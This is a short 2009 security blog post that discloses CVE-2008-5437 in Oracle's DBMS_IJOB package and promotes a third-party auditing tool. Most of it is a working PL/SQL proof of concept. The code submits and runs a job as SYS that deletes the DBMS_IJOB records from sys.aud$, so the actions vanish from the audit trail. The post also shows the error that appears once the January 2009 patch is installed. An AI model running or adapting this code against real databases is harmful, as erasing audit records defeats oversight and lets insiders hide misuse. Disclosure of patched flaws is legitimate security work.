Proof-of-concept how to bypass Oracle Auditing using DBMS_IJOB

16 Jan 2009 von Alexander Kornbrust.

Here is the proof of concept code for the issue in dbms_ijob [CVE-2008-5437] from Volker Solinus, a really smart DBA, my former colleague from Oracle Consulting Germany.

A different bug concerning Auditing reported by us is still open. Oracle Auditing alone is not sufficient because there are various ways to bypass it. . Often it is better to use a 3rd-party solution like Hedgehog from Sentrigo.

– Bypassing Oracle Auditing
– Everything executed via dbms_ijob (granted to DBAs by default)
– will not appear in the Oracle auditing
– by Volker Solinus

declare
jj    integer := 666666;    — job number
begin
sys.dbms_ijob.submit(
JOB =>        jj,
LUSER =>    ‘SYS’,
PUSER =>    ‘SYS’,
CUSER =>    ‘SYS’,
NEXT_DATE =>    sysdate,
INTERVAL =>    null,
BROKEN =>    false,
WHAT =>        ‘
declare
jj    integer := ‘||jj||’;
begin
execute immediate ”alter system archive log current”;
sys.dbms_ijob.remove(jj);
delete from sys.aud$ where obj$name = ”DBMS_IJOB”;
commit;
end;’,
NLSENV =>     ‘NLS_LANGUAGE=”AMERICAN” NLS_TERRITORY=”AMERICA” NLS_CURRENCY=”$” NLS_ISO_CURRENCY=”AMERICA” NLS_NUMERIC_CHARACTERS=”.,” NLS_DATE_FORMAT=”DD-MON-RR” NLS_DATE_LANGUAGE=”AMERICAN” NLS_SORT=”BINARY”’,
ENV =>        hextoraw(’0102000200000000′));
sys.dbms_ijob.run(jj);
exception when others then
if sqlcode=-12011 then
sys.dbms_ijob.remove(jj);
end if;
raise;
end;
/
After applying the January CPU 2009 you will get the following error message:

ERROR at line 1:
ORA-12718: operation requires connection as SYS
ORA-06512: at line 32

Geschrieben in Exploit, Oracle Security | Drucken | Keine Kommentare »